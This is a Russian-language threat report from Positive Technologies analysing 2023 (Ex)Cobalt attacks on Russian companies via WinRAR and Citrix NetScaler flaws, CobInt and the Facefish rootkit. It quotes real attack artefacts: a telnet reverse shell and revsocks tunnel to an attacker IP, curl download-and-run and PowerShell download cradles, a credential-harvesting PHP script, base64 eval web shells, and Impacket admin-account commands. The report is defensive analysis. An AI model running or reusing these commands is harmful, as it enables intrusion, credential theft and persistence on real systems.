Уже не те: атаки (Ex)Cobalt на российские компании в 2023 году

Введение

Деятельность киберпреступной группы Cobalt отслеживается с 2016 года и направлена на атаки кредитно-финансовых организаций для кражи средств. Однако в последние несколько лет группа сместила акцент атак с банков и теперь больше похожа на группу, которая занимается кибершпионажем. Несмотря на отсутствие громких кампаний с 2020 года, нами в последние несколько лет регулярно фиксируются фишинговые рассылки вредоносных файлов, вложенных в архив, запуск которых приводит к загрузке модуля CobInt. Это ВПО является одним из основных инструментов группы, и ранее не фиксировалось использование этого инструмента другими группами.

Кроме фишинговых рассылок, вредоносные файлы использовались в ходе атак на российские компании в сферах энергетики, образования и телекоммуникаций, что было зафиксировано во время реагирования на инциденты информационной безопасности в 2023 году. Обнаруженные факты позволяют сделать вывод, что группа Cobalt или некоторые из ее участников до сих пор активны.

В статье будут рассмотрены две цепочки атак с использованием актуальных уязвимостей CVE-2023-38831 и CVE-2023-3519, а также руткит Facefish, используемый для компрометации узлов под управлением ОС Linux.

Вектор № 1. Запрос от (Ex)Cobalt

В конце августа 2023 года специалистами экспертного центра безопасности Positive Technologies (PT Expert Security Center, PT ESC) был замечен тренд на использование уязвимости CVE-2023-38831 в программном обеспечении WinRAR.

Из общего потока наблюдаемых файлов нас заинтересовал архив ucx_2314_4_2_ot_28_08_2023.rar, содержащий файл-приманку в формате PDF и вредоносный исполняемый файл.

В файле-приманке описана продукция китайской корпорации авиационной промышленности, текст написан на русском языке, что позволяет считать последующую цепочку действий целенаправленной атакой.

Так как архив имеет измененную файловую структуру, при открытии PDF файла происходит запуск исполняемого PE-файла Zapros_2314_4_2_ot_28_08_2023.pdf .cmd, который представляет собой установщик на платформе Nullsoft Scriptable Install System (NSIS) и инициирует следующий этап атаки.

Кроме описанного выше сценария первичного доступа с использованием уязвимости был обнаружен архив Zapros_13-2-16442-upr_ot_25_08_2023.zip c файловым ярлыком, который извлекает из себя и запускает аналогичный исполняемый файл. Команда LNK-файла:

    

/v /c set g="%cd%\Zapros_13-2-16442-upr_ot_25_08_2023.lnk"&(if not exist "!g!" (for /f "tokens=*" %u in ('where /r "%localappdata%" Zapros_13-2-16442-upr_ot_25_08_2023.l?k') do set g=%u))&>nul set n=t&set f=e&set o=%temp%&certu!n!il -decode "!g!" !o!\fahsdiksfaem.!f!xe&start /b !o!\fahsdiksfaem
    

Интересным является факт, что в именах файлов-приманок используется одинаковая маска Zapros*.

Дроппер NSIS

NSIS-скрипт, выполняющий процесс установки, извлекает во временную папку следующие файлы:

• файл-приманку (аналогичный PDF-файлу в архиве);
• открытый PowerShell-скрипт декодирования;
• шифрованный PowerShell-скрипт декодирования;
• набор закодированных файлов (их предназначение описано далее).

Кроме того, этот скрипт вызывает команды плагина — динамически подключаемой библиотеки nnujshaigu.dll (imphash:9ffedcca1b5171b3fb3e4430638971c1).

Первым делом жертве демонстрируется ожидаемый PDF-файл (см. рис. 3). Следующей командой исполняется PowerShell-скрипт yplseoefri.txt декодирования кода из файла auspun.txt, который отвечает за получение ключа от управляющего сервера hxxps://wop[.]fsbkal[.]com/xseyyzpyy.txt и расшифровку второго скрипта декодирования алгоритмом AES в режиме CBC. Для образца, извлеченного из LNK-файла, ключ загружается с соседнего домена hxxps://zay[.]fsbkal[.]com/isicpjgki.txt.

На момент исследования файлы-ключи для загрузки с управляющих серверов не были доступны, поэтому «штатная» работа ВПО завершалась, так как следующие команды предполагают расшифровку файла gmzaofeioe.dat для декодирования им оставшихся файлов.

Зашифрованный файл имеет сопоставимый размер (26 Кб) с PowerShell-скриптом декодирования на первом этапе, а оставшиеся файлы ampifkinn.txt, tygnfg.txt, yapaaiu.txt имеют схожий внешний вид отформатированного псевдослучайного текста, что позволило предположить, что на обоих этапах используется одинаковый алгоритм, но разный словарь кодировки.

Алгоритм декодирования подразумевает следующие шаги:

• исключение всех небуквенных символов;
• приведение всех символов к нижнему регистру;
• разбиение получившегося массива на пары — строки длиной 2 байта;
• замена каждой пары одним символом ASCII.

Стоит отметить, что каждый ASCII-символ имеет строго три варианта сопоставления (например, символ «a» может быть получен из пар «se», «he», «am»). Таким образом, зная основные лексемы языка PowerShell, а также частоты встречаемости символов в этом языке, удалось восстановить словарь и декодировать оставшиеся три файла.

Следующим этапом происходит декодирование файла полезной нагрузки и VBS-скрипта запуска полезной нагрузки, а также закрепление в системе при помощи записи в ветку реестра SOFTWARE\Microsoft\Windows\CurrentVersion\Run ключа letsintellsvc, маскируясь под легитимное ПО.

VBS-скрипт деобфусцирует строку запуска файла основной нагрузки:

    

%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -ex bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File "LetsIntell.ps1"
    

Файл полезной нагрузки

Полезная нагрузка представлена PowerShell-скриптом, который хранит в себе два шелл-кода под архитектуры x86 и x64, подготавливает память и передает на них управление по заданному смещению. Скрипты имеют характерную обфускацию строк и большое число функций, выполняющих конкатенацию строк. Скрипт детектируется рядом антивирусных средств с вердиктом PwShell.Carbanak.

Шелл-код отвечает за загрузку основного компонента CobInt с контрольного сервера с адресом hxxps://logilokforce[.]com/vooijfmoyehiaoii. Адрес контрольного сервера и URL-адрес зашифрованы алгоритмом XOR c 4-байтовым ключом.

На момент анализа файлов основная нагрузка с этого контрольного сервера была недоступна. Подобные скрипты с встроенным шелл-кодом мы наблюдали в течение продолжительного времени и ранее. В следующей таблице перечислены контрольные суммы аналогичных файлов и извлеченные из них адреса для скачивания основной нагрузки. Выделены URL-адреса, с которых удалось загрузить файл следующего этапа.

Все полученные файлы являются экземплярами основного модуля CobInt, логика работы которых соответствует описанию в статье компании Proofpoint и в материале Group-IB.

Вектор № 2. The Green Mile

Осенью 2023 года команду PT CSIRT привлекли к реагированию на инцидент информационной безопасности в российской компании в сфере энергетики. В ходе реагирования экспертами было установлено, что в организации был скомпрометирован шлюз удаленного доступа к сети Citrix NetScaler Gateway версии 13.1.

Первоначальный доступ

Предположительно, злоумышленникам удалось получить доступ при помощи публично известной уязвимости CVE-2023-3519, опубликованной в июле 2023 года. Подробный разбор уязвимости исследователями Assetnote:

• Analysis of CVE-2023-3519 in Citrix ADC and NetScaler Gateway;
• Analysis of CVE-2023-3519 in Citrix ADC and NetScaler Gateway (Part 2);
• Finding and Exploiting Citrix NetScaler Buffer Overflow (CVE-2023-3519) (Part 3).

На момент анализа шлюза веб-журналы были ротированы, поэтому подтвердить эксплуатацию уязвимости через связанные с ней GET-запросы не удалось. Тем не менее в неразмеченном пространстве файловой системы удалось обнаружить характерные запросы /gwtest/formssso?event=start&target=, которые указывают на попытки эксплуатации уязвимости CVE-2023-3519.

В процессе анализа был выявлен ряд веб-шеллов в директории /var/netscaler/logon/. Записи появились в файловой системе 17.08.2023 и соответствовали логике шелл-кода из опубликованного proof of concept от 01.08.2023.

При анализе сервера был выявлен простой веб-шелл с именем ctxHeaderLogon.php и ключом JohnCoffey2023!, позволяющий удаленно исполнять команды на шлюзе.

Кроме того, был обнаружен скрипт netscaler.php, который перехватывает входящие POST-запросы, а после записывает полученные из URL-адреса учетные записи в файл netscaler.1. Таким образом злоумышленникам удалось похитить десятки учетных записей.

    
<?php
$date = date("d/m/y : H:i :");
$username= $_POST['u'];
$password= $_POST['p'];
#$password2= $_POST['p2'];
if ($username !="undefined"){
    $username = urldecode($username);
    $password = urldecode($password);
file_put_contents("netscaler.1","Username:".$username.PHP_EOL ,FILE_APPEND);
file_put_contents("netscaler.1","Password:".$password.PHP_EOL ,FILE_APPEND);
file_put_contents('netscaler.1', "Date:".$date.$data.PHP_EOL, FILE_APPEND);
#file_put_contents("netscaler.1", "PIN:".$password2.PHP_EOL ,FILE_APPEND);
file_put_contents("netscaler.1","------------------".PHP_EOL ,FILE_APPEND);
}
?>    

Пример скомпрометированной учетной записи из файла netscaler.1.

    

Username: [REDACTED]
Password:QWerty2024
Date:11/09/23 : 05:59 :
-----------------------------------------------------
    

Про аналогичную связку веб-шелла, скрипта перехвата учетных записей и эксплуатацию уязвимости CVE-2023-3519 писали исследователи из компании Huntress в материале от 26.09.2023. Других пересечений с атакой, описанной в отчете, и расследуемым инцидентом мы не обнаружили.

Для управления узлом атакующие за достаточно короткий промежуток времени пробовали использовать разные способы, в том числе telnet (reverse shell) и reverse_shell.py.

    

sh -c '(sleep 4325|telnet 51.15.18.85 4102|while : ; 
do sh && break; 
done 2>&1|telnet 51.15.18.85 4102 >/dev/null 2>&1 &)'
    

Запуск reverse_shell.py:

    

Sep 25 13:53:22 [REDACTED] sh_command="python3 rev4204.py "
Sep 25 13:53:43 [REDACTED] sh_command="netstat -an | grep 51.15.18.85 "
    

Содержимое файла reverse_shell.py:

Кроме того, злоумышленники запускали утилиту для туннелирования трафика Revsocks (Reverse socks5).

    

curl -O https://github.com/kost/revsocks/releases/download/v2.2/revsocks_freebsd_amd64
mv revsocks_freebsd_amd64 nsnetsvcs
/netscaler/nsnetsvcs -connect 51.15.18.85:8844 -pass 123
    

ВПО Facefish

Кроме установленных веб-шеллов и программ туннелирования трафика атакующие предприняли попытку загрузки с управляющего сервера eu–debian[.]com и запуска дроппера Facefish с именем ssh3600. Об этом рутките ранее сообщали исследователи из компаний Juniper и Qihoo 360 Netlab.

    

Sep 25 13:47:15 [REDACTED] sh_command="curl -O http://eu-debian.com/ssh3600 ; chmod +x ssh3600 ; ./ssh3600 ; rm -f ssh3600 "
Sep 25 13:47:38 [REDACTED] sh_command="curl -O http://eu-debian.com/ssh3600 ; chmod +x ssh3600 "
    

Образец является разделяемой библиотекой (shared object), которая работает в пользовательском режиме и внедряется в процесс SSHD через метод LD_PRELOAD. Его основное назначение — кража учетных данных SSH, а также удаленное управление зараженным узлом.

Специалисты PT ESC неоднократно обнаруживали руткит Facefish в ходе расследований инцидентов ИБ. Помимо описанных ранее версий, нам удалось обнаружить новую модификацию:

1. В новой версии добавлен перехват функции getdelim, который, подменяя легитимный системный вызов с аналогичным именем, при чтении конфигурационного файла /etc/ssh/sshd_config добавляет в итоговый результат дополнительный порт, на котором сервис SSH принимает входящие подключения.
2. Транспорт реализуется по протоколу HTTPS с использованием библиотеки BearSSL.
3. В новой модификации перехватываются следующие SSH-функции:
• user_key_allowed2;
• sshpam_auth_passwd;
• auth_shadow_pwexpired;
• getpwnamallow;
• login_write (новая функция);
• read_passphrase;
• ssh_userauth2;
• key_perm_ok;
• load_identity_file;
• key_load_private_type (новая функция).

На рисунке ниже представлена временная схема обнаружения образцов ВПО Facefish, которые использовали в атаках на российские компании.

Далее был обнаружен метод закрепления через RC-скрипт на устройстве Citrix NetScaler Gateway, позволяющий выполнять вредоносную нагрузку при каждом перезапуске системы. Метод является легальным и описан в документации к шлюзу. Модифицированный злоумышленниками файл rc.netscaler представлен ниже.

    

cp /nsconfig/gettytab /etc
/bin/sh /etc/ntpd_ctl full_start

nsapimgr -ys skip_systemaccess_policyeval=0
nsapimgr_wr.sh -ys skip_systemaccess_policyeval=0

echo PD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ0pvaG5Db2ZmZXkyMDIzISddKSk7Pz4= | /usr/bin/openssl base64 -d -out  /netscaler/ns_gui/vpn/images/vpn_ns_gui.php

echo PD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ0pvaG5Db2ZmZXkyMDIzISddKSk7Pz4= | /usr/bin/openssl base64 -d -out  /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php

chmod 6555 /bin/sh
chmod 6555 /bin/sh
    

Скрипт записывает содержимое веб-шеллов в файлы vpn_ns_gui.php и css.php, а также устанавливает бит SUID. Ранее этот метод закрепления описали исследователи из Eclypsium.

Продвижение по сети

После успешного закрепления на устройстве Citrix NetScaler Gateway и компрометации привилегированных учетных записей атакующим удалось добраться до сетевого сегмента с Windows хостами.

Для компрометации дополнительных учетных записей злоумышленники провели дамп процесса LSASS с помощью публично доступной утилиты NanoDump.

Для перемещения внутри периметра атакующие использовали фреймворк Impacket. Пример создания учетной записи и добавления ее в группу «Локальные администраторы» представлен ниже.

    

%COMSPEC% /Q /c echo net user SUPPORT_[REDACTED] [REDACTED] /add ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\fRRzcYNi.bat & %COMSPEC% /Q /c %SYSTEMROOT%\fRRzcYNi.bat & del %SYSTEMROOT%\fRRzcYNi.bat

%COMSPEC% /Q /c echo net localgroup administrators SUPPORT_[REDACTED] /add ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\KhVMDxzc.bat & %COMSPEC% /Q /c %SYSTEMROOT%\KhVMDxzc.bat & del %SYSTEMROOT%\KhVMDxzc.bat
    

После добавления учетной записи в группу «Локальные администраторы» злоумышленники многократно пытались запустить обфусцированный PowerShell-скрипт с именем kavupdate.ps1, анализ которого показал, что он является скриптом PwShell.Carbanak. При успешном запуске PwShell.Carbanak скачивает бэкдор CobInt с управляющего сервера kavupdate[.]com и выполняет его в оперативной памяти.

Стоит обратить внимание, что злоумышленники пытаются маскировать свой инструментарий и сетевую инфраструктуру под инфраструктуру «Лаборатории Касперского».

    

%COMSPEC% /Q /c echo powershell.exe -ep bypass -w hidden -c iex ((New-Object Net.WebClient).DownloadString('http://ukr-net.website/kavupdate.ps1')) ^\u003e \\\\%COMPUTERNAME%\\C$\\__output 2^\u003e^\u00261 \u003e %SYSTEMROOT%\\VvMnbfaA.bat \u0026 %COMSPEC% /Q /c %SYSTEMROOT%\\VvMnbfaA.bat \u0026 del %SYSTEMROOT%\\VvMnbfaA.bat
    

PowerShell-скрипт и загрузка основного модуля CobInt совпадают с рассмотренной ранее цепочкой, что позволяет нам объединить атаки. Подобные скрипты регулярно фиксируются специалистами на протяжении нескольких лет. На рисунке 15 представлены имена файлов и связанные с ними контрольные серверы по времени их обнаружения.

Сетевая инфраструктура

Анализ WHOIS-записей контрольных серверов демонстрирует, что большинство фигурирующих в кампании доменов зарегистрированы в Киеве.

Кроме вышеперечисленных записей есть и другие управляющие серверы (смотри раздел «Сетевые индикаторы»), но единого критерия, позволяющего объединить все в одну группу и использовать для атрибуции, выделить не удалось.

Выводы

Рассмотренные в статье цепочки атак, а также вредоносные файлы, выявленные в ходе расследований в 2023 году в организациях сектора энергетики, образования и телекоммуникаций, позволяют сделать вывод, что группа Cobalt или некоторые из ее участников до сих пор активны. Общее число проведенных расследований и обнаруженных файлов предполагает не менее десяти потенциальных жертв на территории России. В арсенале группы появился новый инструмент — руткит Facefish, который атакующие используют для заражения узлов под управлением ОС Linux. Для компрометации компаний группа продолжает использовать актуальные уязвимости CVE-2023-38831 и CVE-2023-3519. На момент исследований в российском интернете было обнаружено более 50 шлюзов Citrix NetScaler Gateway с версиями, подверженными уязвимости.

Авторы: Александр Григорян, Максим Похлебин
Positive Technologies Expert Security Center (PT ESC)

MITRE TTPs

IoC

Файловые индикаторы

Сетевые индикаторы